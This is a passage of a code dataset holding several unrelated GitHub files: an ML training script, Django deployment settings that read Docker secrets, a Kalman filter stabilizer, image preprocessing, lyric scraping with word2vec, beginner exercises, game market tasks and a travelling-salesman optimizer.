src.utils.callbacks import get_callbacks\n\nfrom utils.common_utils import read_config\nfrom utils.data_management import get_data\nfrom utils.model import create_model, save_model ,save_plot\nfrom utils.callbacks import get_callbacks\n\nimport os\nimport argparse \n\ndef training(config_path):\n config = read_config(config_path)\n\n validation_datasize = config [\"params\"][\"validation_datasize\"]\n (X_train, y_train),(X_valid, y_valid), (X_test, y_test)= get_data(validation_datasize)\n\n #print(config)\n\n LOSS_FUNCTION= config [\"params\"][\"loss_function\"]\n OPTIMIZER= config [\"params\"][\"optimizer\"]\n METRICS= config [\"params\"][\"metrices\"]\n NUM_CLASSES=config [\"params\"][\"no_classes\"]\n\n model= create_model(LOSS_FUNCTION,OPTIMIZER,METRICS,NUM_CLASSES)\n\n EPOCHS = config [\"params\"][\"epochs\"]\n VALIDATION_SET = (X_valid, y_valid)\n\n CALLBACK_LIST = get_callbacks(config,X_train);\n\n\n history = model.fit(X_train, y_train, epochs=EPOCHS,\n validation_data=VALIDATION_SET,callbacks=CALLBACK_LIST)\n\n artifacts_dir = config[\"artifacts\"][\"artifacts_dir\"]\n model_name = config[\"artifacts\"][\"model_name\"]\n model_dir = config[\"artifacts\"][\"model_dir\"]\n\n model_dir_path=os.path.join(artifacts_dir,model_dir)\n os.makedirs(model_dir_path,exist_ok=True)\n\n save_model(model, model_name, model_dir_path)\n\n plots_dir = config[\"artifacts\"][\"plots_dir\"]\n plots_dir_path = os.path.join(artifacts_dir, plots_dir)\n os.makedirs(plots_dir_path, exist_ok=True)\n\n plots_name = config[\"artifacts\"][\"plots_name\"]\n loss_acc = history.history\n save_plot(loss_acc,plots_name,plots_dir_path)\n\nif __name__ == '__main__':\n\n args=argparse.ArgumentParser()\n\n args.add_argument('-c', '--config',default=\"config.yaml\")\n\n # default– value produced if the arguments are absent from the command line\n\n parsed_args = args.parse_args()\n\n #The benefit of using argparse is that if I have one more another configuration file also and I have to experiment\n #whether it will work or not, and we donot have to change anything in original configuration file.\n #We just need pass it as argument in the CLI .\n #For eg: Suppose if we have one more configuration file config2.yaml and secrets_custom.yaml\n #in CLI we will pass\n #python src/training.py -config=config2.yaml -secret=secrets_custom.yaml\n #OR\n #python src/training.py -c=config2.yaml -s=secrets_custom.yaml\n #If I donot pass any arguments. For example:\n #python src/training.py\n #default value is taken as argument\n\n training(config_path=parsed_args.config)# to get the value of config we write parsed_args.config\n\n #args.add_argument('-s', '--secret',default=\"secrets.yaml\")\n #training(config_path=parsed_args.secret)","repo_name":"arjunaju123/ANN_implementation_Python_scripting","sub_path":"src/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37715114327","text":"from .base import *\n\ndef read_secret(secret_name):\n file = open('/run/secrets/' + secret_name)\n secret = file.read()\n secret = secret.rstrip().lstrip()\n file.close()\n\n return secret\n\n\nenv = environ.Env( # secret key를 위한 설정!!\n # set casting, default value\n DEBUG=(bool, False)\n)\n\n# reading .env file\nenviron.Env.read_env(\n env_file= os.path.join(BASE_DIR, '.env') # secret key를 위한 설정!!\n)\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = read_secret('DJANGO_SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False # 배포할때는 false여야 수정이 불가능함!!\n\nALLOWED_HOSTS = ['*']\n\n\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = { # 위의 링크로 들어가서 아래내용 복사하고 붙여넣기!!\n 'default': {\n 'ENGINE': 'django.db.backends.mysql', # mysql을 쓰는 이유는 mariadb는 mysql의 분기된 db임 그래서 거의 같다고 보면됨!!\n 'NAME': 'django', # 연결하는 mariadb 안에서 db를 만들것이다. 그 만든 db의 이름이 어떻게 될것인지 설정하는 것이다.\n 'USER': 'django', # 유저이름 설정인듯\n 'PASSWORD': read_secret('MYSQL_PASSWORD'), # 비번설정\n 'HOST': 'mariadb', # 연결된 컨테이너끼리는 container의 이름을 통해 통신하기때문에 mariadb라는 컨테이너를 만들었으니 이름을 적어주면 연결됨!!\n 'PORT': '3306', # 연결된 컨테이너끼리는 이름으로 연결이가능!! 127.0.0.1:8000 <= 이 형식이 아니라 도메인형식으로 연결 할수 있게 된다!!\n } # 마리아db, mysql 은 3306번 포트를 사용함!!\n}\n","repo_name":"choijinan/pragmatic","sub_path":"pragmatic/settings/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7749057707","text":"\"\"\"\nUsing Kalman Filter as a point stabilizer to stabiliz a 2D point.\n\"\"\"\nimport numpy as np\nimport cv2\n\n\nclass Stabilizer:\n \"\"\"Using Kalman filter as a point stabilizer.\"\"\"\n\n def __init__(self,\n state_num=4,\n measure_num=2,\n cov_process=0.0001,\n cov_measure=0.1):\n \"\"\"Initialization\"\"\"\n # Currently we only support scalar and point, so check user input first.\n assert state_num == 4 or state_num == 2, \"Only scalar and point supported, Check state_num please.\"\n\n # Store the parameters.\n self.state_num = state_num\n self.measure_num = measure_num\n\n # The filter itself.\n self.filter = cv2.KalmanFilter(state_num, measure_num, 0)\n\n # Store the state.\n self.state = np.zeros((state_num, 1), dtype=np.float32)\n\n # Store the measurement result.\n self.measurement = np.array((measure_num, 1), np.float32)\n\n # Store the prediction.\n self.prediction = np.zeros((state_num, 1), np.float32)\n\n # Kalman parameters setup for scalar.\n if self.measure_num == 1:\n self.filter.transitionMatrix = np.array([[1, 1],\n [0, 1]], np.float32)\n\n self.filter.measurementMatrix = np.array([[1, 1]], np.float32)\n\n self.filter.processNoiseCov = np.array([[1, 0],\n [0, 1]], np.float32) * cov_process\n\n self.filter.measurementNoiseCov = np.array(\n [[1]], np.float32) * cov_measure\n\n # Kalman parameters setup for point.\n if self.measure_num == 2:\n self.filter.transitionMatrix = np.array([[1, 0, 1, 0],\n [0, 1, 0, 1],\n [0, 0, 1, 0],\n [0, 0, 0, 1]], np.float32)\n\n self.filter.measurementMatrix = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0]], np.float32)\n\n self.filter.processNoiseCov = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]], np.float32) * cov_process\n\n self.filter.measurementNoiseCov = np.array([[1, 0],\n [0, 1]], np.float32) * cov_measure\n\n def update(self, measurement):\n \"\"\"Update the filter\"\"\"\n # Make kalman prediction\n self.prediction = self.filter.predict()\n\n # Get new measurement\n if self.measure_num == 1:\n self.measurement = np.array([[np.float32(measurement[0])]])\n else:\n self.measurement = np.array([[np.float32(measurement[0])],\n [np.float32(measurement[1])]])\n\n # Correct according to mesurement\n self.filter.correct(self.measurement)\n\n # Update state value.\n self.state = self.filter.statePost\n\n def set_q_r(self, cov_process=0.1, cov_measure=0.001):\n \"\"\"Set new value for processNoiseCov and measurementNoiseCov.\"\"\"\n if self.measure_num == 1:\n self.filter.processNoiseCov = np.array([[1, 0],\n [0, 1]], np.float32) * cov_process\n self.filter.measurementNoiseCov = np.array(\n [[1]], np.float32) * cov_measure\n else:\n self.filter.processNoiseCov = np.array([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]], np.float32) * cov_process\n self.filter.measurementNoiseCov = np.array([[1, 0],\n [0, 1]], np.float32) * cov_measure","repo_name":"kwea123/VTuber_Unity","sub_path":"head_pose_estimation/stabilizer.py","file_name":"stabilizer.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":751,"dataset":"github-code","pt":"66"} +{"seq_id":"70531796050","text":"from PIL import Image, ImageChops\nfrom resizeimage import resizeimage\nimport numpy as np\n\ndef trim(im):\n bg = Image.new(im.mode, im.size, im.getpixel((0,0)))\n diff = ImageChops.difference(im, bg)\n diff = ImageChops.add(diff, diff, 2.0, -100)\n bbox = diff.getbbox()\n if bbox:\n return im.crop(bbox)\n\nimg = Image.open(\"../media/img011-00011.png\")\ngray = img.convert('L')\nbw = gray.point(lambda x: 255 if x<128 else 0, '1')\ncropp = trim(bw)\nimg_resize = resizeimage.resize_cover(cropp, [28, 28])\nimg_resize.save(\"../media/preprocessing_data/result_bw.png\")\n\n","repo_name":"brajchit/ai_ocr","sub_path":"hello/preprocessing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"15503714459","text":"class Solution(object):\n def sortEvenOdd(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n even, odd, final = [], [], []\n \n for i in range(len(nums)):\n if i % 2 != 0:\n odd.append(nums[i])\n else:\n even.append(nums[i])\n \n even.sort()\n odd.sort(reverse=True)\n minlen = min(len(even), len(odd))\n for i in range(minlen):\n final.append(even[i])\n final.append(odd[i])\n if len(even) == minlen:\n final += odd[minlen:]\n else:\n final += even[minlen:]\n return final\n ","repo_name":"husainridwan/leetcode-solutions","sub_path":"2164-sort-even-and-odd-indices-independently/2164-sort-even-and-odd-indices-independently.py","file_name":"2164-sort-even-and-odd-indices-independently.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"11623819866","text":"import os\n\nimport oneAsc2kml\n\ndef asc2kml(ascfilesdir):\n ascfilesList = os.listdir(ascfilesdir)\n\n for ascfile in ascfilesList: \n if os.path.splitext(ascfile)[1] == \".ASC\":\n bestgnsspos_asc_dir = ascfilesdir + \"/\" + ascfile \n oneAsc2kml.oneAsc2kml(bestgnsspos_asc_dir)\n\n#test...\n# folder of bestgnsspos.asc\n# ascfilesdir = \"/home/slam/EcarxTools_202102/asc2kml\"\n# asc2kml(ascfilesdir)","repo_name":"AaronWangmin/asc2kml","sub_path":"asc2kml/asc2kml.py","file_name":"asc2kml.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19373120753","text":"# pip install gensim\n# pip install janome\n\nfrom lib2to3.pgen2 import token\nfrom urllib import request\nimport requests\nfrom bs4 import BeautifulSoup\nfrom janome.tokenizer import Tokenizer\nfrom gensim.models import word2vec\nimport time\nimport re\n\nstarttime = time.time()\n\ndef tokenize(text, t = Tokenizer()):\n tokens = t.tokenize(text)\n word = []\n stop_word = create_stop_word()\n for token in tokens:\n part_of_speech = token.part_of_speech.split(\",\")[0]\n if part_of_speech in ['名詞', '動詞', '形容詞', '形容動詞'] and token.base_form not in stop_word:\n word.append(token.base_form)\n\n return word\n\ndef create_stop_word():\n target_url = \"http://svn.sourceforge.jp/svnroot/slothlib/CSharp/Version1/SlothLib/NLP/Filter/StopWord/word/Japanese.txt\"\n r = requests.get(target_url)\n soup = BeautifulSoup(r.text, \"html.parser\")\n stop_word = str(soup).split()\n\n stop_word.extend([i for i in \"あいうえおかきくけこさしすせそたちつてとなにぬねのはひふへほまみむめもやゆよらりるれろわをん\"])\n stop_word.extend([\"れる\", \"なる\", \"ひる\", \"つて\", \"てる\"])\n\n return stop_word\n\nbase_url = \"https://www.uta-net.com/\"\nresult_search_url = \"https://www.uta-net.com/search/?target=art&type=in&Keyword=%E6%A4%8E%E5%90%8D%E6%9E%97%E6%AA%8E\"\n\nres = requests.get(result_search_url)\nsoup = BeautifulSoup(res.text, \"html.parser\")\n\nsinger_list = [h.get(\"href\") for h in soup.find_all(\"a\", attrs={\"class\": \"d-block\"})]\nsinger_list.extend([\"/artist/3484/\"])\n\nkashi_list = []\nfor u in singer_list:\n res = requests.get(base_url + u)\n soup = BeautifulSoup(res.text, \"html.parser\")\n\n for song in soup.find_all(\"span\", attrs={\"class\": \"d-block d-lg-none utaidashi text-truncate\"}):\n kashi = song.string.replace(\"\\u3000\", \" \")\n \n # 英数字の削除\n kashi = re.sub(\"[a-zA-Z0-9_]\",\"\",kashi)\n # 記号の削除\n kashi = re.sub(\"[!-/:-@[-`{-~]\",\"\",kashi)\n # 空白・改行の削除\n kashi = re.sub(u'\\n\\n', '\\n', kashi)\n kashi = re.sub(u'\\r', '', kashi)\n\n kashi = kashi.strip()\n kashi_list.append(kashi)\n\nprint('len :', len(kashi_list))\nsentence = [tokenize(i) for i in kashi_list]\n\nmodel = word2vec.Word2Vec(sentence, min_count=4, window=15)\nfor i in model.wv.most_similar(positive=[\"人生\"], topn=40):\n # 長い単語を出したい時は下の行をコメント解除してtopn=200くらいにした\n # if len(i[0]) > 2:\n print(round(i[1], 8), i[0])\n\nprint('time :', time.time() - starttime)","repo_name":"teraos/MorphologicalAnalysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41921324834","text":"'''\nEscreva um programa que leia dois números e compare-os, mostrando na tela uma mensagem:\n- O primeiro valor é o maior.\n- O segundo valor é o maior.\n- Não existe nenhum valor, os dois são iguais.\n'''\n# DICIONÁRIO DE CORES\ncores = {'limpa': '\\033[m',\n 'amarelo': '\\033[33m'\n }\n\nprint('{}****** SISTEMA DE COMPARAÇÃO ******{}'.format(cores['amarelo'], cores['limpa']))\n\nn1 = float(input('Insira o primeiro número: '))\nn2 = float(input('Insira o segundo número: '))\n\nif n1 < n2:\n print('O número {} é maior que o número {}.'.format(n2, n1))\nelif n1 > n2:\n print('O número {} é maior que o número {}.'.format(n1, n2))\nelse:\n print('Os números são iguais!')\n\nprint('********* FIM DA EXECUÇÃO DO PROGRAMA! *********')\n","repo_name":"frederico-prog/python","sub_path":"cursoemvideo/Atividades/exercicios/ex038.py","file_name":"ex038.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"13617714748","text":"print(f'{\" Challenge 101 \":=^99}')\n# Create a program that has a function called vote() that will receive as a parameter the year of birth of a person,\n# returning a literal value indicating whether a person has a DENIED, OPTIONAL and MANDATORY vote in the elections.\nprint('>>> Voting program ')\nprint(\"INSTRUCTIONS:\\nEnter the data and the program will return the person's condition regarding the next elections.\")\nprint('-' * 99)\n\n\ndef vote(birth):\n\tfrom datetime import date\n\tcurrent = date.today().year\n\tage = current - birth\n\tif age < 16:\n\t\treturn f\"> This voter does not vote.\"\n\telif 16 <= age < 18 or age >= 65:\n\t\treturn f'> This voter has optional vote.'\n\telse:\n\t\treturn f'> This voter has a mandatory vote.'\n\n\nyear = int(input('Year of birth: '))\nprint(vote(year))\n\nprint('=' * 99)\n","repo_name":"andre7582/Python-Projects","sub_path":"cursoemvideo/desafio_101.py","file_name":"desafio_101.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"374559565","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# https://docs.scrapy.org/en/latest/topics/items.html\n#\n# Author: react117 \n# Email: avikbhattacharyya.2k@gmail.com, avik@ai4bharat.org\n\nimport scrapy\n\n\nclass UrlExtractorItem(scrapy.Item):\n # The source URL\n url_from = scrapy.Field()\n\n # The destination URL\n url_to = scrapy.Field()\n ","repo_name":"react117/url_extractor","sub_path":"url_extractor/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1958937293","text":"from os import path\nfrom setuptools import setup, find_packages\n\n\ndef get_readme():\n here = path.abspath(path.dirname(__file__))\n with open(path.join(here, 'README.md'), encoding='utf-8') as readme_file:\n readme = readme_file.read()\n return readme\n\n\ndef get_requirements():\n here = path.abspath(path.dirname(__file__))\n with open(path.join(here, 'requirements.txt'), encoding='utf-8') as \\\n requirements_file:\n requirements = requirements_file.read().splitlines()\n return requirements\n\n\nsetup(\n name='virtual-modi',\n version='0.3.1',\n author='Jinsung Ha',\n author_email='jsung5381@naver.com',\n description=(\n 'Implementation of virtual MODI modules written in Python.'\n ),\n long_description=get_readme(),\n long_description_content_type='text/markdown',\n license='MIT',\n install_requires=get_requirements(),\n url='https://github.com/LUXROBO/virtual-modi',\n packages=find_packages(),\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent'\n ],\n)\n","repo_name":"LUXROBO/virtual-modi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"576597439","text":"exit_falg = False\n#外层循环\nfor i in range(0, 5):\n #内存循环\n for j in range(0, 3):\n print(\"i的值是:%d j的值是:%d\" %(i, j))\n if j == 1:\n exit_falg = True\n #调出外层循环\n break\n #如果exit_flag为True,跳出外层循环\n if exit_falg:\n break","repo_name":"ChenFu0420/leranpython","sub_path":"4parts/break_out.py","file_name":"break_out.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28264215991","text":"# -*- coding: utf-8 -*-\nfrom django.db.models import Max\n\nfrom engine.tasks import ResolutionTask\nfrom engine_modules.market.models import Market, CorporationMarket\n\n\nclass AbstractBubblesTask(ResolutionTask):\n\t\"\"\"\n\tThis is an abstract class for the updating of Bubbles, it should be inherited from, but not used\n\t\"\"\"\n\n\tdef run(self, game):\n\n\t\t# We can force the use of bubbles using the force_bubbles flag\n\t\tif game.disable_side_effects and not hasattr(game, 'force_bubbles'):\n\t\t\treturn\n\n\t\t# This uses an underlying assumption: that a CorporationMarket with a value at 0 is NOT eligible to a domination bubble,\n\t\t# even if other Corporations were to have even lower assets on this Market.\n\t\t# It means '0' CANNOT be a superposed state for 'bubble_value', so we don't need 2 fields (for positive and negative bubbles)\n\n\t\t# We let negative bubbles on corporations crashed this turn\n\n\t\t# Now get all positive bubbles. We annotate the CorporationMarkets with the field 'maxval', containing the maximal value across all\n\t\tpositive_bubbles = {}\n\t\tmax_vals = {}\n\t\tfor market in Market.objects.all():\n\t\t\t# A crashed corporation does not compete for positive bubble\n\t\t\tmax_vals[market.name] = CorporationMarket.objects.filter(corporation__game=game, corporation__crash_turn__isnull=True, turn=game.current_turn, market=market).exclude(value__lte=0).aggregate(maximum=Max('value'))['maximum']\n\t\t\tif max_vals[market.name] is not None:\n\t\t\t\ttry:\n\t\t\t\t\t# A crashed corporation does not compete for positive bubble\n\t\t\t\t\tpositive_bubbles[market.name] = CorporationMarket.objects.get(corporation__game=game, corporation__crash_turn__isnull=True, turn=game.current_turn, market=market, value=max_vals[market.name])\n\t\t\t\texcept:\n\t\t\t\t\t# There were several corporations tied for first\n\t\t\t\t\tpass\n\t\tprevious_positive_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, bubble_value=1))\n\n\t\t# We find the positive bubbles that will stay\n\t\tcommon_old_and_new_positive_bubble = []\n\t\tfor pb in positive_bubbles.values():\n\t\t\tfor ppb in previous_positive_bubbles:\n\t\t\t\tif (ppb.corporation == pb.corporation) and (ppb.market == pb.market):\n\t\t\t\t\t# We add the key\n\t\t\t\t\tcommon_old_and_new_positive_bubble.append(\"%s%s\" % (pb.corporation, pb.market))\n\n\t\t# We remove the old positive bubble\n\t\tfor ppb in previous_positive_bubbles:\n\t\t\tif ppb.value <= 0 or \"%s%s\" % (ppb.corporation, ppb.market) not in common_old_and_new_positive_bubble:\n\t\t\t\tppb.update_bubble(CorporationMarket.NO_BUBBLE)\n\n\t\tprevious_negative_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, bubble_value=-1))\n\t\tnegative_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, value__lte=0))\n\t\t\n\t\t# We still have to handle the previous negative bubbles\n\t\tfor pnb in previous_negative_bubbles:\n\t\t\tif pnb.value > 0:\n\t\t\t\t# We handled the other cases in the negative_bubbles loop or we will handle it in the positive_bubble loop\n\t\t\t\tpnb.update_bubble(CorporationMarket.NO_BUBBLE)\n\n\t\t# We add negative bubbles on corporation which doesn't already have one\n\t\tfor nb in negative_bubbles:\n\t\t\tif nb.bubble_value != CorporationMarket.NEGATIVE_BUBBLE:\n\t\t\t\tnb.update_bubble(CorporationMarket.NEGATIVE_BUBBLE)\n\n\t\t# We add the new postitive bubbles if it's a new bubble and if this market doesn't have a negative bubble\n\t\tfor pb in positive_bubbles.values():\n\t\t\tif pb.value > 0 and \"%s%s\" % (pb.corporation, pb.market) not in common_old_and_new_positive_bubble:\n\t\t\t\tpb.update_bubble(CorporationMarket.DOMINATION_BUBBLE)\n\n\nclass UpdateBubblesAfterEffectsTask(AbstractBubblesTask):\n\t\"\"\"\n\tUpdate the bubble value on the CorporationMarket objects after the First/Last effects have been applied\n\t\"\"\"\n\tRESOLUTION_ORDER = 900\n\n\tdef run(self, game):\n\n\t\tif not hasattr(game, 'disable_bubble_reevaluation'):\n\t\t\tsuper(UpdateBubblesAfterEffectsTask, self).run(game)\n\t\treturn\n\n\nclass UpdateBubblesAfterCrashTask(AbstractBubblesTask):\n\t\"\"\"\n\tUpdate the bubble value on the CorporationMarket objects after the Crash effects have been applied\n\t\"\"\"\n\t# Be careful: this task must be resolved before ReplicateCorporationMarketTask\n\tRESOLUTION_ORDER = 1100\n\n\tdef run(self, game):\n\n\t\tif not hasattr(game, 'disable_bubble_reevaluation'):\n\t\t\tsuper(UpdateBubblesAfterCrashTask, self).run(game)\n\n\t\t# We build the logs. We need to calculate the difference bewtween the end on last turn and now to create events\n\t\t# We don't do it in AbstractBubblesTask because we don't want to sent the temporaty states.\n\n\t\t# We let negative bubbles on corporations crashed this turn\n\t\tnegative_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, bubble_value=-1))\n\t\tprevious_negative_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn - 1, bubble_value=-1))\n\t\tpositive_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn, bubble_value=1))\n\t\tprevious_positive_bubbles = list(CorporationMarket.objects.filter(corporation__game=game, turn=game.current_turn - 1, bubble_value=1))\n\n\t\tfor nb in negative_bubbles:\n\t\t\tfor pnb in previous_negative_bubbles:\n\t\t\t\tif (pnb.corporation == nb.corporation) and (pnb.market == nb.market):\n\t\t\t\t\t# This is not a new bubble\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tgame.add_event(event_type=game.GAIN_NEGATIVE_BUBBLE, data={\"market\": nb.market.name, \"corporation\": nb.corporation.base_corporation.name}, delta=-1, corporation=nb.corporation)\n\n\t\tfor pnb in previous_negative_bubbles:\n\t\t\tfor nb in negative_bubbles:\n\t\t\t\tif (pnb.corporation == nb.corporation) and (pnb.market == nb.market):\n\t\t\t\t\t# This is not a new bubble\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tgame.add_event(event_type=game.LOSE_NEGATIVE_BUBBLE, data={\"market\": pnb.market.name, \"corporation\": pnb.corporation.base_corporation.name}, delta=1, corporation=pnb.corporation)\n\n\t\tfor pb in positive_bubbles:\n\t\t\tfor ppb in previous_positive_bubbles:\n\t\t\t\tif (ppb.corporation == pb.corporation) and (ppb.market == pb.market):\n\t\t\t\t\t# This is not a new bubble\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tgame.add_event(event_type=game.GAIN_DOMINATION_BUBBLE, data={\"market\": pb.market.name, \"corporation\": pb.corporation.base_corporation.name}, delta=1, corporation=pb.corporation)\n\n\t\tfor ppb in previous_positive_bubbles:\n\t\t\tfor pb in positive_bubbles:\n\t\t\t\tif (ppb.corporation == pb.corporation) and (ppb.market == pb.market):\n\t\t\t\t\t# This is not a new bubble\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tgame.add_event(event_type=game.LOSE_DOMINATION_BUBBLE, data={\"market\": ppb.market.name, \"corporation\": ppb.corporation.base_corporation.name}, delta=-1, corporation=ppb.corporation)\n\n\t\treturn\n\n\nclass CreateBubblesAfterGameCreationTask(AbstractBubblesTask):\n\t\"\"\"\n\tUpdate the bubble value on the CorporationMarket objects after the creation of the game\n\t\"\"\"\n\t# Be careful: this task must be resolved before ReplicateCorporationMarketTask\n\tRESOLUTION_ORDER = 100\n\n\tdef run(self, game):\n\t\tif not hasattr(game, 'disable_bubble_reevaluation'):\n\t\t\tsuper(CreateBubblesAfterGameCreationTask, self).run(game)\n\n\nclass ReplicateCorporationMarketsTask(ResolutionTask):\n\t\"\"\"\n\tCopy the CorporationMarket objects from current turn for next turn\n\t\"\"\"\n\tRESOLUTION_ORDER = 1200\n\t\n\tdef run(self, game):\n\n\t\t# On next turn, these will stand for the beginning values\n\t\tcorporation_markets = CorporationMarket.objects.filter(corporation__game=game, corporation__crash_turn__isnull=True, turn=game.current_turn)\n\t\tnew_corporation_markets = []\n\t\tfor corporation_market in corporation_markets:\n\t\t\tnew_corporation_market = CorporationMarket(\n\t\t\t\tcorporation=corporation_market.corporation,\n\t\t\t\tmarket=corporation_market.market,\n\t\t\t\tturn=game.current_turn + 1,\n\t\t\t\tvalue=corporation_market.value,\n\t\t\t\tbubble_value=corporation_market.bubble_value)\n\t\t\tnew_corporation_markets.append(new_corporation_market)\n\t\t# On next turn, these will be modified until they stand for the final values\n\t\tCorporationMarket.objects.bulk_create(new_corporation_markets)\n\ntasks = (UpdateBubblesAfterEffectsTask, UpdateBubblesAfterCrashTask, ReplicateCorporationMarketsTask, )\n\ninitialisation_tasks = (CreateBubblesAfterGameCreationTask, ReplicateCorporationMarketsTask, )\n","repo_name":"Neamar/corporate","sub_path":"engine_modules/market/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8174,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"21749573951","text":"C, R = map(int, input().split())\nnum = int(input())\ndi = [0, 1, 0, -1]\ndj = [1, 0, -1, 0]\narr = [[0] * C for _ in range(R)]\n\nif num > C*R:\n print(0)\nelse:\n i, j, dr = 0, R, 0\n for cnt in range(1, C*R +1):\n arr[i][j] = cnt\n ni = i + di[dr]\n nj = j + dj[dr]\n if 0 <= ni < R and 0 <= nj < C and arr[ni][nj] == 0:\n i, j = ni, nj\n else:\n dr = (dr+1) % 4\n i = i+ di[dr]\n j = j+ dj[dr]\n\n arr = list(zip(arr[::-1]))\n arr2 = []\n for lst in arr:\n arr2.append(lst[0])\n\n for n in range(R):\n for m in range(C):\n if num == arr2[n][m]:\n a = R-n\n b = C-m\n\n print(a, b)\n","repo_name":"shinlama/TIL","sub_path":"Algorithms/boj_10157_seat.py","file_name":"boj_10157_seat.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8946984360","text":"import argparse\r\nimport random\r\nimport math\r\nfrom time import time\r\nimport geopy.distance\r\n\r\ndef load_cities(input_file):\r\n cities = {}\r\n city_list=[]\r\n with open(input_file, 'r') as f:\r\n for line in f:\r\n name, x, y = line.strip().split(',')\r\n cities[name] = (float(x), float(y))\r\n city_list.append(name)\r\n return cities\r\n \r\n\r\n# Calculate the Straight line distance between two cities\r\ndef distance(city1, city2):\r\n x1, y1 = city1\r\n x2, y2 = city2\r\n return geopy.distance.geodesic(city1, city2).km\r\ndef random_path(cities):\r\n tour = list(cities.keys())\r\n #tour=tour[0:16]\r\n random.shuffle(tour)\r\n return tour\r\n\r\n# Define the tour length function\r\ndef tour_length(tour,cities):\r\n length = 0\r\n for i in range(len(tour)-1):\r\n length += distance (cities[tour[i]],cities[tour[i+1]])\r\n return length\r\n# Swap two cities in a path\r\ndef swap(path, i, j):\r\n path[i], path[j] = path[j], path[i]\r\n\r\n# Perform the Hill Climbing algorithm \r\ndef hill_climb(cities):\r\n # Generate a random initial path\r\n current_path = random_path(cities)\r\n x=current_path\r\n # Calculate the distance of the current path\r\n current_distance = tour_length(current_path, cities)\r\n y= current_distance\r\n # Keep track of the best path and its distance\r\n best_path = current_path\r\n best_distance = current_distance\r\n # Perform iterations until no better neighbor is found\r\n while True:\r\n # Find the best neighbor\r\n for i in range(len(current_path)):\r\n for j in range(i+1, len(current_path)):\r\n # Swap two cities in the path\r\n swap(current_path, i, j)\r\n # Calculate the distance of the new path\r\n new_distance = tour_length(current_path, cities)\r\n # If the new path is better, remember it\r\n if new_distance < best_distance:\r\n best_path = current_path[:]\r\n best_distance = new_distance\r\n # Swap the cities back to their original positions\r\n swap(current_path, i, j)\r\n # If the best neighbor is not better than the current path, stop\r\n if best_distance == current_distance:\r\n break\r\n # Otherwise, move to the best neighbor and continue\r\n current_path = best_path\r\n current_distance = best_distance\r\n # Return the best path and its distance\r\n return x, y, best_path, best_distance\r\n\r\n\r\n\r\n# Define the acceptance probability function\r\ndef acceptance_probability(current_length, new_length, temperature):\r\n if new_length < current_length:\r\n return 1.0\r\n else:\r\n return math.exp((current_length - new_length) / temperature)\r\n# Define the Simulated Annealing algorithm\r\ndef simulated_annealing(cities, temperature, cooling_rate, stopping_temperature, stopping_iter):\r\n # Initialize the current and best tours\r\n current_tour = random_path(cities)\r\n best_tour = current_tour.copy()\r\n \r\n # Initialize the current and best tour lengths\r\n current_length = tour_length(current_tour,cities)\r\n best_length = current_length\r\n \r\n # Initialize the iteration 